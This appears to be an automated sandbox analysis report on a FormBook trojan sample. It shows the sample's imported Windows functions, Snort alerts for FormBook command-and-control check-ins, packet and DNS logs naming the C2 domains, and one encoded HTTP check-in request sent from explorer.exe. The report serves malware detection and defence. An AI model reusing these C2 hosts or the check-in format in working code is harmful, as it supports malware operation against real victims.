                                                      user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                      kernel32.dllSleep
                                                      oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                      ole32.dllCoUninitialize, CoInitialize
                                                      oleaut32.dllGetErrorInfo, SysFreeString
                                                      comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                      winspool.drvOpenPrinterA, EnumPrintersA, DocumentPropertiesA, ClosePrinter

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishUnited States

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      05/03/21-18:50:24.082679ICMP384ICMP PING192.168.2.62.23.155.232
                                                      05/03/21-18:50:24.117668ICMP449ICMP Time-To-Live Exceeded in Transit84.17.52.126192.168.2.6
                                                      05/03/21-18:50:24.131499ICMP384ICMP PING192.168.2.62.23.155.232
                                                      05/03/21-18:50:24.166703ICMP449ICMP Time-To-Live Exceeded in Transit149.11.89.129192.168.2.6
                                                      05/03/21-18:50:24.167848ICMP384ICMP PING192.168.2.62.23.155.232
                                                      05/03/21-18:50:24.205720ICMP449ICMP Time-To-Live Exceeded in Transit130.117.50.25192.168.2.6
                                                      05/03/21-18:50:24.208738ICMP384ICMP PING192.168.2.62.23.155.232
                                                      05/03/21-18:50:24.251260ICMP449ICMP Time-To-Live Exceeded in Transit130.117.0.62192.168.2.6
                                                      05/03/21-18:50:24.252743ICMP384ICMP PING192.168.2.62.23.155.232
                                                      05/03/21-18:50:24.299719ICMP449ICMP Time-To-Live Exceeded in Transit154.54.36.253192.168.2.6
                                                      05/03/21-18:50:24.300495ICMP384ICMP PING192.168.2.62.23.155.232
                                                      05/03/21-18:50:24.346860ICMP449ICMP Time-To-Live Exceeded in Transit130.117.14.78192.168.2.6
                                                      05/03/21-18:50:24.363755ICMP384ICMP PING192.168.2.62.23.155.232
                                                      05/03/21-18:50:24.425622ICMP449ICMP Time-To-Live Exceeded in Transit195.22.208.117192.168.2.6
                                                      05/03/21-18:50:24.426009ICMP384ICMP PING192.168.2.62.23.155.232
                                                      05/03/21-18:50:24.478878ICMP449ICMP Time-To-Live Exceeded in Transit93.186.128.39192.168.2.6
                                                      05/03/21-18:50:24.479296ICMP384ICMP PING192.168.2.62.23.155.232
                                                      05/03/21-18:50:24.531542ICMP408ICMP Echo Reply2.23.155.232192.168.2.6
                                                      05/03/21-18:52:09.597690TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974580192.168.2.685.159.66.93
                                                      05/03/21-18:52:09.597690TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974580192.168.2.685.159.66.93
                                                      05/03/21-18:52:09.597690TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974580192.168.2.685.159.66.93
                                                      05/03/21-18:52:14.830011TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.623.227.38.74
                                                      05/03/21-18:52:14.830011TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.623.227.38.74
                                                      05/03/21-18:52:14.830011TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.623.227.38.74
                                                      05/03/21-18:52:15.030990TCP1201ATTACK-RESPONSES 403 Forbidden804974723.227.38.74192.168.2.6
                                                      05/03/21-18:52:20.562290TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.6199.59.242.153
                                                      05/03/21-18:52:20.562290TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.6199.59.242.153
                                                      05/03/21-18:52:20.562290TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.6199.59.242.153
                                                      05/03/21-18:52:31.656407TCP1201ATTACK-RESPONSES 403 Forbidden804974934.102.136.180192.168.2.6
                                                      05/03/21-18:52:36.955486TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.6198.54.117.212
                                                      05/03/21-18:52:36.955486TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.6198.54.117.212
                                                      05/03/21-18:52:36.955486TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.6198.54.117.212

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      May 3, 2021 18:51:09.549361944 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.602288008 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.602461100 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.615714073 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.668378115 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.671556950 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.671597004 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.671689987 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.671739101 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.743845940 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.796510935 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.798795938 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.798887014 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.817002058 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.872791052 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.893825054 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.893856049 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.893882036 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.893899918 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.893922091 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.893945932 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.893954992 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.893968105 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.893991947 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.894016981 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.894051075 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.895057917 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.895088911 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.895169020 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.895231009 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.896233082 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.896269083 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.896368980 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.897449017 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.897481918 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.897552967 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.898678064 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.898700953 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.898809910 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.898840904 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.899894953 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.899928093 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.899988890 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.900032997 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.901070118 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.901097059 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.901139021 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.901192904 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.902018070 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.902259111 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.902281046 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.902535915 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.902539968 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.902542114 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.903526068 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.903556108 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.903610945 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.903664112 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.904766083 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.904803991 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.904863119 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.904894114 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.905625105 CEST49723443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.906363010 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.906389952 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.906435013 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.906466961 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.907135010 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.907162905 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.907211065 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.907258034 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.908324003 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.908339977 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.908392906 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.908440113 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.910103083 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.910173893 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.945441961 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.945498943 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.945508957 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.945549965 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.945975065 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.946068048 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.946125984 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.946173906 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.947171926 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.947208881 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.947262049 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.947290897 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.948426962 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.948461056 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.948523998 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.948559999 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.949593067 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.949620962 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.949693918 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.950787067 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.950809956 CEST44349722162.159.130.233192.168.2.6
                                                      May 3, 2021 18:51:09.950875998 CEST49722443192.168.2.6162.159.130.233
                                                      May 3, 2021 18:51:09.951992035 CEST44349722162.159.130.233192.168.2.6

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      May 3, 2021 18:50:16.917824984 CEST5837753192.168.2.68.8.8.8
                                                      May 3, 2021 18:50:16.966393948 CEST53583778.8.8.8192.168.2.6
                                                      May 3, 2021 18:50:17.702219963 CEST5507453192.168.2.68.8.8.8
                                                      May 3, 2021 18:50:17.751035929 CEST53550748.8.8.8192.168.2.6
                                                      May 3, 2021 18:50:18.541116953 CEST5451353192.168.2.68.8.8.8
                                                      May 3, 2021 18:50:18.589854956 CEST53545138.8.8.8192.168.2.6
                                                      May 3, 2021 18:50:19.638772964 CEST6204453192.168.2.68.8.8.8
                                                      May 3, 2021 18:50:19.687648058 CEST53620448.8.8.8192.168.2.6
                                                      May 3, 2021 18:50:19.777815104 CEST6379153192.168.2.68.8.8.8
                                                      May 3, 2021 18:50:19.838969946 CEST53637918.8.8.8192.168.2.6
                                                      May 3, 2021 18:50:20.759305000 CEST6426753192.168.2.68.8.8.8
                                                      May 3, 2021 18:50:20.808120012 CEST53642678.8.8.8192.168.2.6
                                                      May 3, 2021 18:50:21.730690002 CEST4944853192.168.2.68.8.8.8
                                                      May 3, 2021 18:50:21.779658079 CEST53494488.8.8.8192.168.2.6
                                                      May 3, 2021 18:50:23.423787117 CEST6034253192.168.2.68.8.8.8
                                                      May 3, 2021 18:50:23.475630045 CEST53603428.8.8.8192.168.2.6
                                                      May 3, 2021 18:50:24.010915041 CEST6134653192.168.2.68.8.8.8
                                                      May 3, 2021 18:50:24.079168081 CEST53613468.8.8.8192.168.2.6
                                                      May 3, 2021 18:50:24.514899015 CEST5177453192.168.2.68.8.8.8
                                                      May 3, 2021 18:50:24.563467026 CEST53517748.8.8.8192.168.2.6
                                                      May 3, 2021 18:50:25.519568920 CEST5602353192.168.2.68.8.8.8
                                                      May 3, 2021 18:50:25.568375111 CEST53560238.8.8.8192.168.2.6
                                                      May 3, 2021 18:50:27.095774889 CEST5838453192.168.2.68.8.8.8
                                                      May 3, 2021 18:50:27.147340059 CEST53583848.8.8.8192.168.2.6
                                                      May 3, 2021 18:50:28.260931015 CEST6026153192.168.2.68.8.8.8
                                                      May 3, 2021 18:50:28.312387943 CEST53602618.8.8.8192.168.2.6
                                                      May 3, 2021 18:50:29.487543106 CEST5606153192.168.2.68.8.8.8
                                                      May 3, 2021 18:50:29.536183119 CEST53560618.8.8.8192.168.2.6
                                                      May 3, 2021 18:50:30.304311037 CEST5833653192.168.2.68.8.8.8
                                                      May 3, 2021 18:50:30.352907896 CEST53583368.8.8.8192.168.2.6
                                                      May 3, 2021 18:50:31.231823921 CEST5378153192.168.2.68.8.8.8
                                                      May 3, 2021 18:50:31.280483961 CEST53537818.8.8.8192.168.2.6
                                                      May 3, 2021 18:50:33.115289927 CEST5406453192.168.2.68.8.8.8
                                                      May 3, 2021 18:50:33.164786100 CEST53540648.8.8.8192.168.2.6
                                                      May 3, 2021 18:50:34.085856915 CEST5281153192.168.2.68.8.8.8
                                                      May 3, 2021 18:50:34.138001919 CEST53528118.8.8.8192.168.2.6
                                                      May 3, 2021 18:50:35.339718103 CEST5529953192.168.2.68.8.8.8
                                                      May 3, 2021 18:50:35.391753912 CEST53552998.8.8.8192.168.2.6
                                                      May 3, 2021 18:50:36.644537926 CEST6374553192.168.2.68.8.8.8
                                                      May 3, 2021 18:50:36.695036888 CEST53637458.8.8.8192.168.2.6
                                                      May 3, 2021 18:50:37.540646076 CEST5005553192.168.2.68.8.8.8
                                                      May 3, 2021 18:50:37.589503050 CEST53500558.8.8.8192.168.2.6
                                                      May 3, 2021 18:50:53.721870899 CEST6137453192.168.2.68.8.8.8
                                                      May 3, 2021 18:50:53.772696018 CEST53613748.8.8.8192.168.2.6
                                                      May 3, 2021 18:50:58.970330954 CEST5033953192.168.2.68.8.8.8
                                                      May 3, 2021 18:50:59.027769089 CEST53503398.8.8.8192.168.2.6
                                                      May 3, 2021 18:51:09.468744040 CEST6330753192.168.2.68.8.8.8
                                                      May 3, 2021 18:51:09.530808926 CEST53633078.8.8.8192.168.2.6
                                                      May 3, 2021 18:51:11.998219013 CEST4969453192.168.2.68.8.8.8
                                                      May 3, 2021 18:51:12.055107117 CEST53496948.8.8.8192.168.2.6
                                                      May 3, 2021 18:51:19.291080952 CEST5498253192.168.2.68.8.8.8
                                                      May 3, 2021 18:51:19.395440102 CEST53549828.8.8.8192.168.2.6
                                                      May 3, 2021 18:51:20.280843973 CEST5001053192.168.2.68.8.8.8
                                                      May 3, 2021 18:51:20.413621902 CEST53500108.8.8.8192.168.2.6
                                                      May 3, 2021 18:51:21.416019917 CEST6371853192.168.2.68.8.8.8
                                                      May 3, 2021 18:51:21.474960089 CEST53637188.8.8.8192.168.2.6
                                                      May 3, 2021 18:51:21.520019054 CEST6211653192.168.2.68.8.8.8
                                                      May 3, 2021 18:51:21.592957973 CEST53621168.8.8.8192.168.2.6
                                                      May 3, 2021 18:51:22.274025917 CEST6381653192.168.2.68.8.8.8
                                                      May 3, 2021 18:51:22.331511021 CEST53638168.8.8.8192.168.2.6
                                                      May 3, 2021 18:51:23.264955044 CEST5501453192.168.2.68.8.8.8
                                                      May 3, 2021 18:51:23.321846008 CEST53550148.8.8.8192.168.2.6
                                                      May 3, 2021 18:51:23.943481922 CEST6220853192.168.2.68.8.8.8
                                                      May 3, 2021 18:51:24.004406929 CEST53622088.8.8.8192.168.2.6
                                                      May 3, 2021 18:51:24.489432096 CEST5757453192.168.2.68.8.8.8
                                                      May 3, 2021 18:51:24.538288116 CEST53575748.8.8.8192.168.2.6
                                                      May 3, 2021 18:51:25.751430988 CEST5181853192.168.2.68.8.8.8
                                                      May 3, 2021 18:51:25.808527946 CEST53518188.8.8.8192.168.2.6
                                                      May 3, 2021 18:51:27.492124081 CEST5662853192.168.2.68.8.8.8
                                                      May 3, 2021 18:51:27.551889896 CEST53566288.8.8.8192.168.2.6
                                                      May 3, 2021 18:51:27.984098911 CEST6077853192.168.2.68.8.8.8
                                                      May 3, 2021 18:51:28.043740034 CEST53607788.8.8.8192.168.2.6
                                                      May 3, 2021 18:51:35.091263056 CEST5379953192.168.2.68.8.8.8
                                                      May 3, 2021 18:51:35.155028105 CEST53537998.8.8.8192.168.2.6
                                                      May 3, 2021 18:51:56.609668016 CEST5468353192.168.2.68.8.8.8
                                                      May 3, 2021 18:51:56.684485912 CEST53546838.8.8.8192.168.2.6
                                                      May 3, 2021 18:52:05.791529894 CEST5932953192.168.2.68.8.8.8
                                                      May 3, 2021 18:52:05.840135098 CEST53593298.8.8.8192.168.2.6
                                                      May 3, 2021 18:52:09.401087999 CEST6402153192.168.2.68.8.8.8
                                                      May 3, 2021 18:52:09.506803036 CEST53640218.8.8.8192.168.2.6
                                                      May 3, 2021 18:52:11.019495010 CEST5612953192.168.2.68.8.8.8
                                                      May 3, 2021 18:52:11.076555014 CEST53561298.8.8.8192.168.2.6
                                                      May 3, 2021 18:52:14.692928076 CEST5817753192.168.2.68.8.8.8
                                                      May 3, 2021 18:52:14.785726070 CEST53581778.8.8.8192.168.2.6
                                                      May 3, 2021 18:52:20.046948910 CEST5070053192.168.2.68.8.8.8
                                                      May 3, 2021 18:52:20.434478045 CEST53507008.8.8.8192.168.2.6
                                                      May 3, 2021 18:52:25.740961075 CEST5406953192.168.2.68.8.8.8
                                                      May 3, 2021 18:52:26.404896975 CEST53540698.8.8.8192.168.2.6
                                                      May 3, 2021 18:52:31.418256998 CEST6117853192.168.2.68.8.8.8
                                                      May 3, 2021 18:52:31.477593899 CEST53611788.8.8.8192.168.2.6
                                                      May 3, 2021 18:52:36.668267012 CEST5701753192.168.2.68.8.8.8
                                                      May 3, 2021 18:52:36.742311001 CEST53570178.8.8.8192.168.2.6
                                                      May 3, 2021 18:52:42.204746962 CEST5632753192.168.2.68.8.8.8
                                                      May 3, 2021 18:52:42.269726992 CEST53563278.8.8.8192.168.2.6

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      May 3, 2021 18:51:09.468744040 CEST192.168.2.68.8.8.80x9cfaStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                      May 3, 2021 18:52:09.401087999 CEST192.168.2.68.8.8.80x82ceStandard query (0)www.gazipasadan.xyzA (IP address)IN (0x0001)
                                                      May 3, 2021 18:52:14.692928076 CEST192.168.2.68.8.8.80xeffStandard query (0)www.sewadorbsclothing.comA (IP address)IN (0x0001)
                                                      May 3, 2021 18:52:20.046948910 CEST192.168.2.68.8.8.80x2b5fStandard query (0)www.fux.xyzA (IP address)IN (0x0001)
                                                      May 3, 2021 18:52:25.740961075 CEST192.168.2.68.8.8.80xfce1Standard query (0)www.yakin-hm.comA (IP address)IN (0x0001)
                                                      May 3, 2021 18:52:31.418256998 CEST192.168.2.68.8.8.80x8a03Standard query (0)www.brandonprattdrums.comA (IP address)IN (0x0001)
                                                      May 3, 2021 18:52:36.668267012 CEST192.168.2.68.8.8.80x1955Standard query (0)www.courtclassesathome.comA (IP address)IN (0x0001)
                                                      May 3, 2021 18:52:42.204746962 CEST192.168.2.68.8.8.80x730Standard query (0)www.agilelocker.comA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      May 3, 2021 18:51:09.530808926 CEST8.8.8.8192.168.2.60x9cfaNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                      May 3, 2021 18:51:09.530808926 CEST8.8.8.8192.168.2.60x9cfaNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                      May 3, 2021 18:51:09.530808926 CEST8.8.8.8192.168.2.60x9cfaNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                      May 3, 2021 18:51:09.530808926 CEST8.8.8.8192.168.2.60x9cfaNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                      May 3, 2021 18:51:09.530808926 CEST8.8.8.8192.168.2.60x9cfaNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                      May 3, 2021 18:52:09.506803036 CEST8.8.8.8192.168.2.60x82ceNo error (0)www.gazipasadan.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)
                                                      May 3, 2021 18:52:09.506803036 CEST8.8.8.8192.168.2.60x82ceNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)
                                                      May 3, 2021 18:52:09.506803036 CEST8.8.8.8192.168.2.60x82ceNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)
                                                      May 3, 2021 18:52:14.785726070 CEST8.8.8.8192.168.2.60xeffNo error (0)www.sewadorbsclothing.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                      May 3, 2021 18:52:14.785726070 CEST8.8.8.8192.168.2.60xeffNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                      May 3, 2021 18:52:20.434478045 CEST8.8.8.8192.168.2.60x2b5fNo error (0)www.fux.xyz71822.bodis.comCNAME (Canonical name)IN (0x0001)
                                                      May 3, 2021 18:52:20.434478045 CEST8.8.8.8192.168.2.60x2b5fNo error (0)71822.bodis.com199.59.242.153A (IP address)IN (0x0001)
                                                      May 3, 2021 18:52:26.404896975 CEST8.8.8.8192.168.2.60xfce1Name error (3)www.yakin-hm.comnonenoneA (IP address)IN (0x0001)
                                                      May 3, 2021 18:52:31.477593899 CEST8.8.8.8192.168.2.60x8a03No error (0)www.brandonprattdrums.combrandonprattdrums.comCNAME (Canonical name)IN (0x0001)
                                                      May 3, 2021 18:52:31.477593899 CEST8.8.8.8192.168.2.60x8a03No error (0)brandonprattdrums.com34.102.136.180A (IP address)IN (0x0001)
                                                      May 3, 2021 18:52:36.742311001 CEST8.8.8.8192.168.2.60x1955No error (0)www.courtclassesathome.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                      May 3, 2021 18:52:36.742311001 CEST8.8.8.8192.168.2.60x1955No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                      May 3, 2021 18:52:36.742311001 CEST8.8.8.8192.168.2.60x1955No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                      May 3, 2021 18:52:36.742311001 CEST8.8.8.8192.168.2.60x1955No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                      May 3, 2021 18:52:36.742311001 CEST8.8.8.8192.168.2.60x1955No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                      May 3, 2021 18:52:36.742311001 CEST8.8.8.8192.168.2.60x1955No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                      May 3, 2021 18:52:36.742311001 CEST8.8.8.8192.168.2.60x1955No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                      May 3, 2021 18:52:36.742311001 CEST8.8.8.8192.168.2.60x1955No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                      May 3, 2021 18:52:42.269726992 CEST8.8.8.8192.168.2.60x730No error (0)www.agilelocker.com52.58.78.16A (IP address)IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • www.gazipasadan.xyz
                                                      • www.sewadorbsclothing.com
                                                      • www.fux.xyz

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.64974585.159.66.9380C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      May 3, 2021 18:52:09.597690105 CEST5255OUTGET /nt8e/?blm=IHJLWq3Ti4lOD4kq8gztCbzA17cUlgM1ZPUn0ujbMY4leENIWoOfJYoGYHcW17z38P8xUAoycA==&tVTd=M6AhI HTTP/1.1
